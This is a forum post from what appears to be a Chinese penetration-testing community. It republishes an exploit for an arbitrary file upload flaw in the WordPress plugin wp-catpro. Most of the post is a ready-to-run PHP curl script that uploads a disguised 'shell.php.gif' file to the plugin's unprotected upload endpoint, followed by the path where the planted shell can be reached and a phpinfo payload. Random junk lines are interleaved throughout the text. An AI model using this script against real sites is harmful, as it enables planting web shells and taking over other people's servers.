中国网络渗透测试联盟
标题:
WordPress插件wp-catpro任意文件上传
[打印本页]
作者:
admin
时间:
2013-2-27 20:12
标题:
WordPress插件wp-catpro任意文件上传
Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
% p2 l5 ]# ^9 |, w- j7 {
#-----------------------------------------------------------------------
9 _; @/ L' A. F2 f) _
8 E9 I8 q+ `4 w: }& U8 \5 U
作者 => Zikou-16
8 h2 i& h: w, B* f
邮箱 =>
zikou16x@gmail.com
/ f/ x7 |) W; q9 O B
测试系统 : Windows 7 , Backtrack 5r3
0 Z2 u( H2 v& l- l
下载地址 :
http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
, [1 \8 K3 \0 L. y" I/ t
####
& P+ G+ P) p5 q5 E
8 H7 p/ C/ n/ N" ~% K6 c J+ P
#=> Exploit 信息:
$ D% s. E* a0 K
------------------
% L+ T3 x+ F0 S% }7 q% C7 l8 P; B
# 攻击者可以上传 file/shell.php.gif
' C) w' ]9 b# E7 {( }& |
# ("jpg", "gif", "png") // Allowed file extensions
' {& ^: T9 ~6 x! D, q9 F1 n
# "/uploads/"; // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
/ F3 G8 [( b0 S; V4 Q1 e5 Y& x8 ^
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
' D# I1 p9 _9 g( z. L
------------------
* E; G' ` c# Q- c2 I
, y f" u4 @ `' {
#=> Exploit
) R% c U$ b. p/ u1 j
-----------
5 [; K. e$ c6 Y! W7 C1 D% A: M
<?php
4 Z$ Y) ]" v- w' M9 j! K& e
; o! W% E! N: r6 J7 G
$uploadfile="zik.php.gif";
6 q$ M, @2 R, @& Y
$ch = curl_init("http://[
www.2cto.com
]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
7 _2 E8 d' b" j5 _( s& t
curl_setopt($ch, CURLOPT_POST, true);
- A: W# R. i( S' }1 b
curl_setopt($ch, CURLOPT_POSTFIELDS,
0 m- b# V1 M3 ]# x" `; h" M5 p
array('Filedata'=>"@$uploadfile",
$ [6 T$ @9 ]6 n# a
'folder'=>'/wp-content/uploads/catpro/'));
8 U) S$ x3 B% f- [0 C, }- X! w
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
. q+ `+ A: G; q1 n/ i7 n4 o& J
$postResult = curl_exec($ch);
* m! r: k% f+ K2 x- |
curl_close($ch);
4 ^$ M! R2 R) t$ P6 D5 k
7 ~ V: ^2 a3 {9 i3 E6 y
print "$postResult";
9 ]% m2 k8 }! t: U% y. M
; U/ W# K p `- m- p9 ]
Shell Access : http://[
www.xxx.com
]/[path]/wp-content/uploads/catpro/random_name.php.gif
. u: k. w e. G& y: Q) _- X
?>
( q7 A" U6 C2 q! o
<?php
* F$ f# P4 i! m9 \
phpinfo();
; }" {6 i& N& e7 F. s6 Z8 _
?>
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2